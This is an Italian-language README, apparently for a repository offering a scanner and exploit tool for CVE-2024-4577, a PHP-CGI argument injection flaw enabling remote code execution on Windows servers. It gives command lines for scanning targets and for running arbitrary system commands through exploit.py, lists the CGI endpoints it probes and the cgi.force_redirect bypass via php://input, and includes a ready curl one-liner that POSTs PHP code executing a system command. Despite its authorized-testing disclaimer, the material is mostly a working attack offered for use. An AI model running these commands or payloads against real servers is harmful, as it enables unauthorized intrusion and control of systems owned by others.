
Scanner e strumento di exploit per CVE-2024-4577, una vulnerabilità di iniezione di argomenti CGI PHP che consente l'esecuzione remota di codice su sistemi Windows. Include moduli di rilevamento ed esecuzione di comandi.
CVE-2024-4577 è una vulnerabilità critica di iniezione di argomenti PHP CGI che colpisce i sistemi Windows che eseguono PHP in modalità CGI. Questa falla consente a un attaccante remoto di iniettare argomenti nella riga di comando di PHP tramite URL appositamente costruiti, portando a esecuzione remota di codice (RCE).
Questo repository include:
CVE-2024-4577.py: uno scanner per rilevare target vulnerabili.exploit.py: uno strumento di exploit che invia codice PHP ed esegue comandi di sistema sul server vulnerabile.⚠️ AVVERTENZA
Questo progetto è solo per test educativi e autorizzati. Qualsiasi uso improprio di questo codice non è responsabilità dell'autore. Usa in modo responsabile e solo in ambienti di tua proprietà o per i quali hai esplicita autorizzazione al test.
requestsInstalla le dipendenze:
pip install -r requirements.txt
Rileva se un target è vulnerabile a CVE-2024-4577:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
Lo scanner e l'exploit testano endpoint CGI comuni come:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
Il payload aggira cgi.force_redirect e antepone PHP dannoso utilizzando php://input.
Esegue comandi di sistema arbitrari su un target vulnerabile:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

Puoi anche sfruttare la vulnerabilità manualmente usando curl
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
Questo invia un payload PHP che esegue uname -a sul server e restituisce l'output.

Questo codice è rilasciato sotto la licenza MIT. Vedi LICENSE per maggiori informazioni.